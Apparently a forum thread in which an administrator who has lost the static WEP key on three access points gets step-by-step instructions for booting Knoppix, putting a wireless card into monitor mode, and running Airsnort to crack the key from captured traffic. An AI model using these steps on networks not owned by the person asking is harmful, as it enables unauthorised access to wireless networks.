We have 3 APs that were installed before I got here that are running static WEP. Nobody remembers what the key is but we have clients using the APs and I'm hoping to avoid re-keying all of the clients.
Is there a way to take the WEP hash in the config and back into the original key? Kind of like the Cisco password cracker tools you see out there?
But, you could try Airsnort (a public domain WEP cracker).
Go to knoppix.org, dowload their 4.02 ,iso, and burn it to a CD.
Put the CD in the drive and boot the laptop. It will come up in Knoppix Linux (but doesn't write to or otherwise mess with your hard drive).
Open a terminal session, do an "ifconfig eth0 22.214.171.124 netmask 255.0.0.0" (address doesn't matter, you'll be in monitor mode).
Then do an "iwconfig eth0 mode monitor" (this puts the card in monitor mode)
Then type in "airsnort" at the prompt, select eth0 as the interface, hostAP as the type, "scan" as the mode (to start), then hit the start button.
Once it starts running (you'll see information listed in the main window), you can select the channel tp monitor specifically (gathers more info just for that channel instead of scanning all the channels).
Then just let it run. Depending on the traffic level, it could take a few hours or a few days or a few weeks. It needs to collect enough "interesting" traffic to make the crack.
Depending on the NIC that you use, the interface could come up as eht0, eth1, ath0, wlan0, wlan1 ..... just adjust the commands accordingly.
Once it prints the WEP key, try it on another machine before killing the processes ans exiting (or you get to start all over again).
Knoppix Linux is free, and version 4.x works great.